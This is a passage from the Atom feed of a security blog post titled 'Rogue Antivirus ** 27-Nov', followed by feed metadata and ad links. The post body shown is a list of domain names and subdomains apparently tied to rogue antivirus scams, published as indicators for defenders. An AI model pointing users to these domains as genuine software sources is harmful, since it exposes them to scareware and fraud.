/&gt;&lt;/div&gt;&lt;div&gt;experimentalways.com&lt;/div&gt;&lt;div&gt;handutilities.com&lt;/div&gt;&lt;div&gt;mail.experimentalways.com&lt;/div&gt;&lt;div&gt;mail.handutilities.com&lt;/div&gt;&lt;div&gt;mail.toolsand.com&lt;/div&gt;&lt;div&gt;mail.yourtoolscheap.com&lt;/div&gt;&lt;div&gt;ns1.handutilities.com&lt;/div&gt;&lt;div&gt;thesecurityutility.net&lt;/div&gt;&lt;div&gt;toolsand.com&lt;/div&gt;&lt;div&gt;www.dvdprotools.com&lt;/div&gt;&lt;div&gt;www.onlineworldcar.com&lt;/div&gt;&lt;div&gt;www.onlineworldtech.com&lt;/div&gt;&lt;div&gt;www.toolsand.com&lt;/div&gt;&lt;div&gt;www.yourtoolscheap.com&lt;/div&gt;&lt;div&gt;yourtoolscheap.com&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2579819762662120694?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/2579819762662120694/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=2579819762662120694" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2579819762662120694?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2579819762662120694?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/ufvdTs23olA/rogue-antivirus-27-nov.html" title="Rogue Antivirus ** 27-Nov" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/11/rogue-antivirus-27-nov.html</feedburner:origLink></entry></feed>
